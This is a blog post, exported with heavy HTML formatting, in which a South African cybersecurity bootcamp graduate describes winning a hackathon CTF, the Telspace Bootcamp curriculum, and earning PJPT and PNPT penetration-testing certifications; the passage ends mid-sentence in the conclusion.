tag:blogger.com,1999:blog-25401686165523984622024-03-05T08:31:17.818+02:00Telspace Africa, The BlogHackers for hireUnknownnoreply@blogger.comBlogger140125tag:blogger.com,1999:blog-2540168616552398462.post-12442385881287703682023-10-27T10:30:00.000+02:002023-10-27T10:30:03.882+02:00<p><span style="font-size: x-large;"><b><span style="color: #2e5395; letter-spacing: -0.1pt;">Transformative</span></b><b><span style="color: #2e5395; letter-spacing: -0.5pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt; mso-ansi-language: EN-ZA;">Journey:</span></b><b><span style="color: #2e5395; letter-spacing: -0.45pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt; mso-ansi-language: EN-ZA;">My</span></b><b><span style="color: #2e5395; letter-spacing: -0.45pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt; mso-ansi-language: EN-ZA;">Experience</span></b><b><span style="color: #2e5395; letter-spacing: -0.45pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt; mso-ansi-language: EN-ZA;">at</span></b><b><span style="color: #2e5395; letter-spacing: -0.45pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt; mso-ansi-language: EN-ZA;">the</span></b><b><span style="color: #2e5395; letter-spacing: -0.45pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt; mso-ansi-language: EN-ZA;">Telspace</span></b><b><span style="color: #2e5395; letter-spacing: -0.45pt; mso-ansi-language: EN-ZA;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt;">Bootcamp</span></b></span></p><div class="WordSection1">
<p class="MsoBodyText" style="margin-left: 0cm;">My journey through the world of cybersecurity
has been a series of remarkable milestones, all of which led me to the life
changing Telspace Bootcamp experience. It all began with a triumphant win at
the ITWeb Security Summit Hackathon.<span style="letter-spacing: -0.25pt;"> </span>This<span style="letter-spacing: -0.25pt;"> </span>victory<span style="letter-spacing: -0.3pt;">
</span>not<span style="letter-spacing: -0.3pt;"> </span>only<span style="letter-spacing: -0.3pt;"> </span>marked<span style="letter-spacing: -0.3pt;"> </span>my<span style="letter-spacing: -0.3pt;"> </span>entry<span style="letter-spacing: -0.25pt;"> </span>into<span style="letter-spacing: -0.3pt;"> </span>the<span style="letter-spacing: -0.35pt;"> </span>Telspace<span style="letter-spacing: -0.35pt;"> </span>Bootcamp<span style="letter-spacing: -0.3pt;">
</span>but<span style="letter-spacing: -0.3pt;"> </span>also<span style="letter-spacing: -0.3pt;"> </span>set<span style="letter-spacing: -0.3pt;"> </span>the<span style="letter-spacing: -0.35pt;"> </span>stage<span style="letter-spacing: -0.35pt;">
</span>for<span style="letter-spacing: -0.3pt;"> </span>my<span style="letter-spacing: -0.3pt;"> </span>journey of growth and achievement. In this blog post, I will
delve into my enriching experience at the Telspace Bootcamp, from its
commencement on July 3rd, 2023, to its conclusion on August 31st, 2023, and the
certifications that crowned<span style="letter-spacing: -0.5pt;"> </span>my<span style="letter-spacing: -0.5pt;"> </span><span style="letter-spacing: -0.1pt;">journey.</span></p>
<p class="MsoBodyText" style="margin-left: 0cm;"><b><span style="color: #2e5395;"><span style="font-size: medium;">From<span style="letter-spacing: -0.55pt;"> </span>Hackathon<span style="letter-spacing: -0.5pt;"> </span>to<span style="letter-spacing: -0.55pt;"> </span>Bootcamp:<span style="letter-spacing: -0.5pt;"> </span>A<span style="letter-spacing: -0.5pt;"> </span>Dream<span style="letter-spacing: -0.55pt;"> </span>Come<span style="letter-spacing: -0.55pt;"> </span><span style="letter-spacing: -0.2pt;">True</span></span></span></b></p>
<div style="margin-top: 0.05pt; text-align: left;">Back in June 2023, I had the opportunity of a
lifetime – participating in the ITWeb Security Summit Hackathon which<span style="letter-spacing: -0.2pt;"> </span>Telspace<span style="letter-spacing: -0.1pt;">
</span>sponsors<span style="letter-spacing: -0.3pt;"> </span>every<span style="letter-spacing: -0.2pt;"> </span>year.<span style="letter-spacing: -0.2pt;"> </span>The<span style="letter-spacing: -0.25pt;"> </span>event<span style="letter-spacing: -0.2pt;"> </span>took<span style="letter-spacing: -0.2pt;"> </span>place<span style="letter-spacing: -0.25pt;"> </span>at<span style="letter-spacing: -0.2pt;"> </span>the<span style="letter-spacing: -0.25pt;"> </span>prestigious<span style="letter-spacing: -0.3pt;"> </span>Sandton<span style="letter-spacing: -0.2pt;">
</span>Convention<span style="letter-spacing: -0.2pt;"> </span>Centre,<span style="letter-spacing: -0.2pt;"> </span>where cybersecurity<span style="letter-spacing: -0.3pt;"> </span>enthusiasts<span style="letter-spacing: -0.35pt;"> </span>and<span style="letter-spacing: -0.15pt;"> </span>experts<span style="letter-spacing: -0.35pt;">
</span>gathered<span style="letter-spacing: -0.3pt;"> </span>to<span style="letter-spacing: -0.3pt;"> </span>showcase<span style="letter-spacing: -0.25pt;">
</span>their<span style="letter-spacing: -0.35pt;"> </span>skills.<span style="letter-spacing: -0.3pt;"> </span>I<span style="letter-spacing: -0.3pt;"> </span>was<span style="letter-spacing: -0.35pt;"> </span>determined<span style="letter-spacing: -0.15pt;"> </span>to<span style="letter-spacing: -0.3pt;"> </span>prove<span style="letter-spacing: -0.35pt;"> </span>myself<span style="letter-spacing: -0.4pt;">
</span>in<span style="letter-spacing: -0.3pt;"> </span>the Red<span style="letter-spacing: -0.35pt;"> </span>Teaming<span style="letter-spacing: -0.4pt;"> </span>Capture<span style="letter-spacing: -0.35pt;">
</span>the<span style="letter-spacing: -0.35pt;"> </span>Flag<span style="letter-spacing: -0.3pt;"> </span>(CTF)<span style="letter-spacing: -0.3pt;"> </span>competition<span style="letter-spacing: -0.25pt;"> </span>that<span style="letter-spacing: -0.35pt;"> </span>was<span style="letter-spacing: -0.4pt;"> </span>built<span style="letter-spacing: -0.35pt;"> </span>by
the<span style="letter-spacing: -0.35pt;"> </span>Telspace<span style="letter-spacing: -0.4pt;"> </span>Team.<span style="letter-spacing: -0.35pt;"> </span>I<span style="letter-spacing: -0.35pt;"> </span>was<span style="letter-spacing: -0.3pt;"> </span>so<span style="letter-spacing: -0.25pt;"> </span>thrilled<span style="letter-spacing: -0.3pt;">
</span>to<span style="letter-spacing: -0.35pt;"> </span>have<span style="letter-spacing: -0.4pt;"> </span>emerged as the winner of the ITWeb
Security Summit Hackathon 2023.<span style="letter-spacing: 2pt;"> </span>It
was an incredible journey, and I was grateful for the opportunity to showcase
my skills in identifying vulnerabilities and proposing innovative solutions.</div>
<p class="MsoBodyText" style="line-height: 107%; margin-right: 17.5pt; text-align: justify;">Upon<span style="letter-spacing: -0.25pt;"> </span>winning<span style="letter-spacing: -0.3pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>hackathon<span style="letter-spacing: -0.15pt;">
</span>I<span style="letter-spacing: -0.25pt;"> </span>received<span style="letter-spacing: -0.25pt;"> </span>an<span style="letter-spacing: -0.25pt;"> </span>invitation<span style="letter-spacing: -0.25pt;"> </span>to<span style="letter-spacing: -0.25pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>Telspace<span style="letter-spacing: -0.3pt;">
</span>Bootcamp -<span style="letter-spacing: -0.1pt;"> </span>this<span style="letter-spacing: -0.3pt;"> </span>was<span style="letter-spacing: -0.35pt;"> </span>a<span style="letter-spacing: -0.25pt;"> </span>dream<span style="letter-spacing: -0.3pt;"> </span>come<span style="letter-spacing: -0.3pt;"> </span>true.<span style="letter-spacing: -0.2pt;"> </span>This
bootcamp<span style="letter-spacing: -0.25pt;"> </span>was<span style="letter-spacing: -0.3pt;"> </span>renowned<span style="letter-spacing: -0.25pt;"> </span>for<span style="letter-spacing: -0.25pt;"> </span>its<span style="letter-spacing: -0.35pt;"> </span>rigorous<span style="letter-spacing: -0.35pt;"> </span>and<span style="letter-spacing: -0.25pt;"> </span>comprehensive<span style="letter-spacing: -0.3pt;"> </span>training<span style="letter-spacing: -0.3pt;">
</span>program.<span style="letter-spacing: -0.25pt;"> </span>It<span style="letter-spacing: -0.25pt;"> </span>promised<span style="letter-spacing: -0.25pt;">
</span>to<span style="letter-spacing: -0.25pt;"> </span>not<span style="letter-spacing: -0.25pt;"> </span>only<span style="letter-spacing: -0.35pt;"> </span>equip<span style="letter-spacing: -0.25pt;"> </span>me with the necessary skills but also
immerse me in the practicalities of the cybersecurity world.</p>
<p class="MsoBodyText" style="margin-left: 0cm;"><b><span style="color: #2e5395;"><span style="font-size: medium;">A<span style="letter-spacing: -0.45pt;"> </span>Dynamic<span style="letter-spacing: -0.35pt;">
</span>Learning<span style="letter-spacing: -0.35pt;"> </span><span style="letter-spacing: -0.1pt;">Environment</span></span></span></b></p>
<div style="text-align: left;">From day one, the Telspace Bootcamp proved to be
a dynamic and immersive learning environment. The curriculum<span style="letter-spacing: -0.35pt;"> </span>covered<span style="letter-spacing: -0.3pt;">
</span>an<span style="letter-spacing: -0.3pt;"> </span>extensive<span style="letter-spacing: -0.35pt;"> </span>range<span style="letter-spacing: -0.35pt;">
</span>of<span style="letter-spacing: -0.4pt;"> </span>cybersecurity<span style="letter-spacing: -0.3pt;"> </span>topics,<span style="letter-spacing: -0.3pt;">
</span>from<span style="letter-spacing: -0.35pt;"> </span>the<span style="letter-spacing: -0.35pt;"> </span>fundamentals<span style="letter-spacing: -0.4pt;"> </span>to<span style="letter-spacing: -0.25pt;"> </span>advanced<span style="letter-spacing: -0.3pt;"> </span>techniques.<span style="letter-spacing: -0.25pt;"> </span>The instructors were not just educators; they were experienced
professionals who shared their real-world insights and experiences. This made
the learning experience both enriching and practical.</div><div style="text-align: left;"><br /></div>
<div style="text-align: justify;"><span style="mso-ansi-language: EN-ZA;"><span style="font-size: small;"><u><b>The<span style="letter-spacing: -0.45pt;"> </span>Bootcamp<span style="letter-spacing: -0.4pt;">
</span>programme<span style="letter-spacing: -0.25pt;"> </span>included,<span style="letter-spacing: -0.4pt;"> </span>but<span style="letter-spacing: -0.4pt;"> </span>was<span style="letter-spacing: -0.4pt;"> </span>not<span style="letter-spacing: -0.45pt;"> </span>limited<span style="letter-spacing: -0.4pt;"> </span><span style="letter-spacing: -0.25pt;">to:</span></b></u></span></span></div><div><div><ul style="text-align: left;"><li>Hardware hacking</li><li>Hands on Hacking Fundamentals</li><li>Enterprise Infrastructure Hacking</li><li>Web Application Hacking</li><li>Mobile Application Pen testing</li><li>Hacking APIs</li><li>Academy All-Access Membership from TCM Security</li></ul></div></div></div><div class="WordSection1">
<p class="MsoListParagraph" style="margin-top: 0.9pt; tab-stops: 41.0pt; text-indent: 0cm;"><span style="font-size: medium;"><b><span style="color: #2e5395; letter-spacing: -0.1pt;">Hands-on Practical</span></b><b><span style="color: #2e5395; letter-spacing: -0.05pt;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt;">Exercises</span></b></span></p>
<div style="text-align: left;">One<span style="letter-spacing: -0.3pt;"> </span>of<span style="letter-spacing: -0.35pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>hallmarks<span style="letter-spacing: -0.3pt;"> </span>of<span style="letter-spacing: -0.35pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>Telspace<span style="letter-spacing: -0.3pt;">
</span>Bootcamp<span style="letter-spacing: -0.25pt;"> </span>was<span style="letter-spacing: -0.35pt;"> </span>its<span style="letter-spacing: -0.2pt;"> </span>emphasis<span style="letter-spacing: -0.35pt;"> </span>on<span style="letter-spacing: -0.25pt;"> </span>hands-on<span style="letter-spacing: -0.25pt;"> </span>practical<span style="letter-spacing: -0.25pt;"> </span>exercises.<span style="letter-spacing: -0.25pt;"> </span>We<span style="letter-spacing: -0.3pt;"> </span>were<span style="letter-spacing: -0.3pt;"> </span>not<span style="letter-spacing: -0.25pt;"> </span>just learning theoretical concepts; we
were applying them in simulated environments. These exercises ranged from
ethical<span style="letter-spacing: -0.25pt;"> </span>hacking<span style="letter-spacing: -0.3pt;"> </span>and<span style="letter-spacing: -0.25pt;"> </span>penetration<span style="letter-spacing: -0.25pt;"> </span>testing<span style="letter-spacing: -0.25pt;">
</span>challenges,<span style="letter-spacing: -0.35pt;"> </span>to<span style="letter-spacing: -0.25pt;"> </span>network<span style="letter-spacing: -0.25pt;">
</span>security simulations.<span style="letter-spacing: -0.25pt;"> </span>They<span style="letter-spacing: -0.25pt;"> </span>were<span style="letter-spacing: -0.3pt;"> </span>designed<span style="letter-spacing: -0.25pt;"> </span>to<span style="letter-spacing: -0.25pt;"> </span>prepare
us for the real challenges faced by cybersecurity professionals.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">At Telspace, one of the most valuable lessons I learned was the stark contrast to many other courses/internships/bootcamps that often inundate students with tools and concepts that rarely find practical application in the real-world scenarios; instead, Telspace was a refreshing departure from the norm, steadfastly focusing on those tools and topics proven to be indispensable for success as an ethical hacker, a deliberate approach that reflected the bootcamps' commitment to providing an education deeply rooted in practicality and real-world relevance, with an incredibly immersive, hands-on structure that not only demystified but also meticulously covered a multitude of foundational topics, effectively equipping me with the knowledge and skills that I knew would truly empower me in the field.</div></div><div class="WordSection2">
<p class="MsoBodyText" style="margin-left: 0cm;"><span style="font-size: medium;"><b><span style="color: #2e5395; letter-spacing: -0.1pt;">Mentorship</span></b><b><span style="color: #2e5395; letter-spacing: -0.15pt;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt;">and</span></b><b><span style="color: #2e5395; letter-spacing: -0.15pt;"> </span></b><b><span style="color: #2e5395; letter-spacing: -0.1pt;">Guidance</span></b></span></p>
<div style="text-align: left;">Throughout the duration of the bootcamp, the invaluable mentorship we
received played an instrumental role in shaping<span style="letter-spacing: -0.4pt;"> </span>our<span style="letter-spacing: -0.35pt;"> </span>development<span style="letter-spacing: -0.35pt;"> </span>and<span style="letter-spacing: -0.35pt;"> </span>enhancing<span style="letter-spacing: -0.35pt;"> </span>our<span style="letter-spacing: -0.35pt;"> </span>learning<span style="letter-spacing: -0.4pt;"> </span>experience,<span style="letter-spacing: -0.35pt;"> </span>as<span style="letter-spacing: -0.45pt;"> </span>our<span style="letter-spacing: -0.35pt;"> </span>dedicated<span style="letter-spacing: -0.35pt;"> </span>mentors<span style="letter-spacing: -0.45pt;"> </span>consistently<span style="letter-spacing: -0.35pt;"> </span>organised and conducted live sessions,
thereby affording us the exceptional opportunity to acquire knowledge and seek clarification<span style="letter-spacing: -0.35pt;"> </span>through<span style="letter-spacing: -0.35pt;"> </span>the<span style="letter-spacing: -0.35pt;"> </span>asking<span style="letter-spacing: -0.35pt;"> </span>of<span style="letter-spacing: -0.4pt;"> </span>questions,<span style="letter-spacing: -0.35pt;"> </span>with<span style="letter-spacing: -0.35pt;"> </span>notable<span style="letter-spacing: -0.4pt;"> </span>examples<span style="letter-spacing: -0.4pt;">
</span>including<span style="letter-spacing: -0.35pt;"> </span>live<span style="letter-spacing: -0.35pt;"> </span>demonstrations<span style="letter-spacing: -0.4pt;"> </span>illustrating<span style="letter-spacing: -0.35pt;"> </span>the
intricate processes of hacking a mobile application and the jailbreaking of an
iPhone; this highly personalised approach employed by our mentors proved to be
a pivotal factor in my educational journey, enabling me to surmount<span style="letter-spacing: -0.6pt;"> </span>obstacles<span style="letter-spacing: -0.55pt;"> </span>and<span style="letter-spacing: -0.55pt;"> </span>gain<span style="letter-spacing: -0.55pt;"> </span>a<span style="letter-spacing: -0.5pt;"> </span>profound<span style="letter-spacing: -0.55pt;"> </span>understanding<span style="letter-spacing: -0.55pt;"> </span>of<span style="letter-spacing: -0.55pt;"> </span>complex<span style="letter-spacing: -0.5pt;"> </span><span style="letter-spacing: -0.1pt;">concepts.</span></div><div style="text-align: left;"><b><span style="color: #2e5395; font-size: 12pt; mso-ansi-language: EN-ZA;"><br /></span></b></div><div style="text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;">Earning<span style="letter-spacing: -0.7pt;"> </span>the<span style="letter-spacing: -0.75pt;"> </span>PJPT<span style="letter-spacing: -0.7pt;"> </span>Certification<span style="letter-spacing: -0.6pt;"> </span>with<span style="letter-spacing: -0.7pt;"> </span>"Early<span style="letter-spacing: -0.65pt;"> </span>Adopter"<span style="letter-spacing: -0.7pt;"> </span><span style="letter-spacing: -0.1pt;">Badge</span></span></span></b></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">One<span style="letter-spacing: -0.5pt;"> </span>of<span style="letter-spacing: -0.5pt;"> </span>the<span style="letter-spacing: -0.45pt;"> </span>most<span style="letter-spacing: -0.45pt;"> </span>significant<span style="letter-spacing: -0.4pt;"> </span>milestones<span style="letter-spacing: -0.5pt;"> </span>during<span style="letter-spacing: -0.5pt;"> </span>my<span style="letter-spacing: -0.4pt;"> </span>tenure<span style="letter-spacing: -0.5pt;"> </span>at<span style="letter-spacing: -0.4pt;"> </span>the<span style="letter-spacing: -0.45pt;"> </span>Telspace<span style="letter-spacing: -0.5pt;"> </span>Bootcamp<span style="letter-spacing: -0.4pt;">
</span>was<span style="letter-spacing: -0.5pt;"> </span>achieving<span style="letter-spacing: -0.5pt;"> </span>the<span style="letter-spacing: -0.45pt;"> </span><span style="letter-spacing: -0.2pt;">PJPT </span>(Practical<span style="letter-spacing: -0.1pt;"> </span>Junior<span style="letter-spacing: -0.1pt;"> </span>Penetration<span style="letter-spacing: -0.1pt;"> </span>Tester)<span style="letter-spacing: -0.15pt;"> </span>certification.<span style="letter-spacing: -0.1pt;"> </span>This<span style="letter-spacing: -0.2pt;"> </span>achievement,<span style="letter-spacing: -0.1pt;"> </span>earned<span style="letter-spacing: -0.1pt;"> </span>on<span style="letter-spacing: -0.1pt;"> </span>July<span style="letter-spacing: -0.1pt;"> </span>27th,<span style="letter-spacing: -0.1pt;"> </span>2023,<span style="letter-spacing: -0.1pt;"> </span>not<span style="letter-spacing: -0.1pt;"> </span>only<span style="letter-spacing: -0.1pt;"> </span>validated
my learnings<span style="letter-spacing: -0.05pt;"> </span>in penetration testing
and ethical hacking<span style="letter-spacing: -0.05pt;"> </span>but also came<span style="letter-spacing: -0.05pt;"> </span>with the<span style="letter-spacing: -0.05pt;">
</span>prestigious "early adopter"<span style="letter-spacing: -0.05pt;">
</span>badge. This<span style="letter-spacing: -0.4pt;"> </span>badge<span style="letter-spacing: -0.35pt;"> </span>symbolised<span style="letter-spacing: -0.3pt;"> </span>my<span style="letter-spacing: -0.3pt;"> </span>dedication<span style="letter-spacing: -0.3pt;"> </span>and<span style="letter-spacing: -0.3pt;"> </span>commitment<span style="letter-spacing: -0.3pt;"> </span>to<span style="letter-spacing: -0.3pt;"> </span>staying<span style="letter-spacing: -0.35pt;"> </span>at<span style="letter-spacing: -0.3pt;"> </span>the<span style="letter-spacing: -0.35pt;"> </span>forefront<span style="letter-spacing: -0.3pt;"> </span>of<span style="letter-spacing: -0.4pt;"> </span>cybersecurity<span style="letter-spacing: -0.3pt;"> </span>knowledge.<span style="letter-spacing: -0.3pt;"> </span>As<span style="letter-spacing: -0.4pt;"> </span>I am part of the
first 100 to obtain this certificate.</div><div style="text-align: left;"><b><u><br /></u></b></div><div style="text-align: left;"><b><u>From<span style="letter-spacing: -0.25pt;"> </span>the<span style="letter-spacing: -0.4pt;"> </span>TCM<span style="letter-spacing: -0.3pt;"> </span>Security<span style="letter-spacing: -0.25pt;"> </span><span style="letter-spacing: -0.1pt;">website:</span></u></b></div><div style="text-align: left;"><br /></div><div style="text-align: left;">"This<span style="letter-spacing: -0.4pt;"> </span>exam<span style="letter-spacing: -0.35pt;"> </span>assesses<span style="letter-spacing: -0.4pt;">
</span>a<span style="letter-spacing: -0.3pt;"> </span>student’s<span style="letter-spacing: -0.4pt;"> </span>ability<span style="letter-spacing: -0.25pt;">
</span>to<span style="letter-spacing: -0.3pt;"> </span>perform<span style="letter-spacing: -0.35pt;"> </span>an<span style="letter-spacing: -0.3pt;"> </span>internal<span style="letter-spacing: -0.3pt;"> </span>network<span style="letter-spacing: -0.3pt;">
</span>penetration<span style="letter-spacing: -0.3pt;"> </span>test<span style="letter-spacing: -0.3pt;"> </span>at<span style="letter-spacing: -0.3pt;"> </span>an<span style="letter-spacing: -0.25pt;"> </span>associate<span style="letter-spacing: -0.35pt;"> </span>level. Students will have two (2) full days to complete the
assessment and an additional two (2) days to write a professional report.</div><div style="text-align: left;"><br /></div>
<div style="margin-top: 0cm; text-align: left;"><b><u><span style="font-size: small;">In<span style="letter-spacing: -0.4pt;"> </span>order<span style="letter-spacing: -0.4pt;"> </span>to<span style="letter-spacing: -0.35pt;"> </span>receive<span style="letter-spacing: -0.5pt;"> </span>the<span style="letter-spacing: -0.4pt;"> </span>certification,<span style="letter-spacing: -0.45pt;"> </span>a<span style="letter-spacing: -0.4pt;"> </span>student<span style="letter-spacing: -0.4pt;"> </span></span><span style="letter-spacing: -0.2pt;"><span style="font-size: small;">must:</span></span></u></b></div><div style="margin-top: 0cm; text-align: left;"><br /></div><div style="margin-top: 0cm; text-align: left;">Leverage<span style="letter-spacing: -0.4pt;"> </span>their<span style="letter-spacing: -0.4pt;"> </span>Active<span style="letter-spacing: -0.4pt;"> </span>Directory<span style="letter-spacing: -0.35pt;"> </span>exploitation<span style="letter-spacing: -0.35pt;"> </span>skillsets<span style="letter-spacing: -0.45pt;"> </span>to<span style="letter-spacing: -0.35pt;"> </span>perform<span style="letter-spacing: -0.4pt;">
</span>lateral<span style="letter-spacing: -0.35pt;"> </span>and<span style="letter-spacing: -0.35pt;"> </span>vertical<span style="letter-spacing: -0.35pt;">
</span>network<span style="letter-spacing: -0.35pt;"> </span>movements,<span style="letter-spacing: -0.35pt;"> </span>and ultimately<span style="letter-spacing: -0.25pt;"> </span>compromise<span style="letter-spacing: -0.2pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>exam<span style="letter-spacing: -0.3pt;"> </span>Domain<span style="letter-spacing: -0.25pt;"> </span>Controller.<span style="letter-spacing: -0.25pt;"> </span>Also,<span style="letter-spacing: -0.25pt;"> </span>provide<span style="letter-spacing: -0.3pt;"> </span>a<span style="letter-spacing: -0.25pt;"> </span>detailed,<span style="letter-spacing: -0.25pt;"> </span>professionally<span style="letter-spacing: -0.25pt;"> </span>written<span style="letter-spacing: -0.25pt;"> </span>report."</div>
</div>
<span face=""Calibri",sans-serif" style="font-size: 11pt; line-height: 105%; mso-ansi-language: EN-ZA; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US;"><br clear="all" style="break-before: page; mso-break-type: section-break; page-break-before: always;" />
</span>
<p class="MsoBodyText"></p><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHrxzuPjW9dQDBREi_HLY-rX2TAG4TQO1P51ymsCHtLkMmRIgYkcGn5xJzmz4WvKipS_MZDpgXVVdCapxPKSyB0n5FA9UDUvIE6FaNjIpaZ3F8v7LHPv01oo9r6Q7WFRQ23dq0qB1QNEVQHlv4agVX8x8gxca_v1bK_PKA9q6RJi8JngFh59iPADqhnXpP/s653/PJPT.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="653" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHrxzuPjW9dQDBREi_HLY-rX2TAG4TQO1P51ymsCHtLkMmRIgYkcGn5xJzmz4WvKipS_MZDpgXVVdCapxPKSyB0n5FA9UDUvIE6FaNjIpaZ3F8v7LHPv01oo9r6Q7WFRQ23dq0qB1QNEVQHlv4agVX8x8gxca_v1bK_PKA9q6RJi8JngFh59iPADqhnXpP/s320/PJPT.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;"><br /></span></span></b></div><div class="separator" style="clear: both; text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;">Conquering<span style="letter-spacing: -0.35pt;"> </span>the<span style="letter-spacing: -0.45pt;"> </span>PNPT<span style="letter-spacing: -0.5pt;"> </span></span><span style="letter-spacing: -0.1pt;"><span style="font-size: medium;">Certification</span></span></span></b></div><div class="separator" style="clear: both; text-align: left;"><b><span style="color: #2e5395;"><span style="letter-spacing: -0.1pt;"><span style="font-size: medium;"><br /></span></span></span></b></div>
<div style="text-align: left;">As<span style="letter-spacing: -0.5pt;"> </span>my<span style="letter-spacing: -0.35pt;"> </span>journey<span style="letter-spacing: -0.35pt;"> </span>continued,<span style="letter-spacing: -0.4pt;"> </span>I<span style="letter-spacing: -0.35pt;"> </span>reached<span style="letter-spacing: -0.35pt;"> </span>another<span style="letter-spacing: -0.4pt;">
</span>pinnacle<span style="letter-spacing: -0.4pt;"> </span>on<span style="letter-spacing: -0.35pt;"> </span>August<span style="letter-spacing: -0.35pt;">
</span>26th,<span style="letter-spacing: -0.4pt;"> </span>2023,<span style="letter-spacing: -0.35pt;"> </span>by<span style="letter-spacing: -0.35pt;"> </span>attaining<span style="letter-spacing: -0.45pt;"> </span>the<span style="letter-spacing: -0.4pt;"> </span>PNPT<span style="letter-spacing: -0.45pt;"> </span><span style="letter-spacing: -0.1pt;">(Practical </span>Network<span style="letter-spacing: -0.45pt;"> </span>Penetration<span style="letter-spacing: -0.45pt;"> </span>Tester)<span style="letter-spacing: -0.35pt;">
</span>certification.<span style="letter-spacing: -0.45pt;"> </span>This<span style="letter-spacing: -0.5pt;"> </span>certification further<span style="letter-spacing: -0.45pt;"> </span>solidified<span style="letter-spacing: -0.45pt;"> </span>my<span style="letter-spacing: -0.45pt;"> </span>learnings<span style="letter-spacing: -0.5pt;"> </span>in<span style="letter-spacing: -0.45pt;"> </span>network<span style="letter-spacing: -0.45pt;"> </span>security<span style="letter-spacing: -0.45pt;">
</span>and<span style="letter-spacing: -0.45pt;"> </span>bolstered my credentials
on my journey to becoming a cybersecurity professional.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbk9CTQBMa1h0hCReQfN_611BBlv8lR4Dx3_mkfKc5Ku1NLyavBJY_YHo39dCJQBLXRnI4DG4NxZx27Kz15JDMxMfZY4D522tMMaTSNzFKD_e-f8BvEVwxYElcr912Pjz3d5hkUco2Vo9zbY7w7xNoiEw0VSBMQKOViNeiPq-FZL_1rS34oIrBOIRWOx4V/s649/PNPT.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="649" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbk9CTQBMa1h0hCReQfN_611BBlv8lR4Dx3_mkfKc5Ku1NLyavBJY_YHo39dCJQBLXRnI4DG4NxZx27Kz15JDMxMfZY4D522tMMaTSNzFKD_e-f8BvEVwxYElcr912Pjz3d5hkUco2Vo9zbY7w7xNoiEw0VSBMQKOViNeiPq-FZL_1rS34oIrBOIRWOx4V/s320/PNPT.jpg" width="320" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;">PNPT<span style="letter-spacing: -0.5pt;"> </span><span style="letter-spacing: -0.133333px;">Advice</span></span></span></b></div><div style="text-align: left;"><b><span style="color: #2e5395; font-size: 12pt;"><span style="letter-spacing: -0.133333px;"><br /></span></span></b></div><div style="text-align: left;">Due<span style="letter-spacing: -0.3pt;"> </span>to<span style="letter-spacing: -0.25pt;"> </span>NDA,<span style="letter-spacing: -0.25pt;"> </span>I<span style="letter-spacing: -0.25pt;"> </span>am<span style="letter-spacing: -0.3pt;"> </span>unable<span style="letter-spacing: -0.35pt;"> </span>to<span style="letter-spacing: -0.25pt;"> </span>discuss<span style="letter-spacing: -0.35pt;"> </span>specifics<span style="letter-spacing: -0.35pt;"> </span>regarding<span style="letter-spacing: -0.3pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>test,<span style="letter-spacing: -0.25pt;"> </span>however<span style="letter-spacing: -0.25pt;"> </span>I<span style="letter-spacing: -0.25pt;"> </span>can<span style="letter-spacing: -0.2pt;"> </span>offer<span style="letter-spacing: -0.25pt;"> </span>the<span style="letter-spacing: -0.3pt;"> </span>following<span style="letter-spacing: -0.3pt;"> </span>guidance<span style="letter-spacing: -0.35pt;"> </span>to anyone preparing to take the PNPT exam:</div>
<p class="MsoBodyText"><b><u><span style="mso-ansi-language: EN-ZA;">Finish these 5
recommended courses:</span></u></b></p><div style="text-align: left;"><ul style="text-align: left;"><li>Practical Ethical Hacking (PEH) course</li><li>Windows Privilege Escalation (WPE) course</li><li>Open-Source Intelligence (OSINT) course</li><li>External Pentest Playbook (EPP) course</li><li>Linux Privilege Escalation (LPE) course</li></ul></div>
<div style="text-align: left;"><h1><b><span style="color: #2e5395;"><span style="font-size: medium;">Conclusion:<span style="letter-spacing: -0.5pt;"> </span>A<span style="letter-spacing: -0.5pt;"> </span>Journey<span style="letter-spacing: -0.3pt;"> </span>of<span style="letter-spacing: -0.55pt;"> </span><span style="letter-spacing: -0.1pt;">Transformation</span></span></span></b></h1></div>
<div style="text-align: left;">My<span style="letter-spacing: -0.3pt;"> </span>experience<span style="letter-spacing: -0.35pt;"> </span>at<span style="letter-spacing: -0.3pt;"> </span>the<span style="letter-spacing: -0.35pt;"> </span>Telspace<span style="letter-spacing: -0.25pt;">
</span>Bootcamp<span style="letter-spacing: -0.3pt;"> </span>was<span style="letter-spacing: -0.4pt;"> </span>not<span style="letter-spacing: -0.3pt;"> </span>just<span style="letter-spacing: -0.3pt;"> </span>a<span style="letter-spacing: -0.3pt;"> </span>training<span style="letter-spacing: -0.35pt;"> </span>program;<span style="letter-spacing: -0.35pt;">
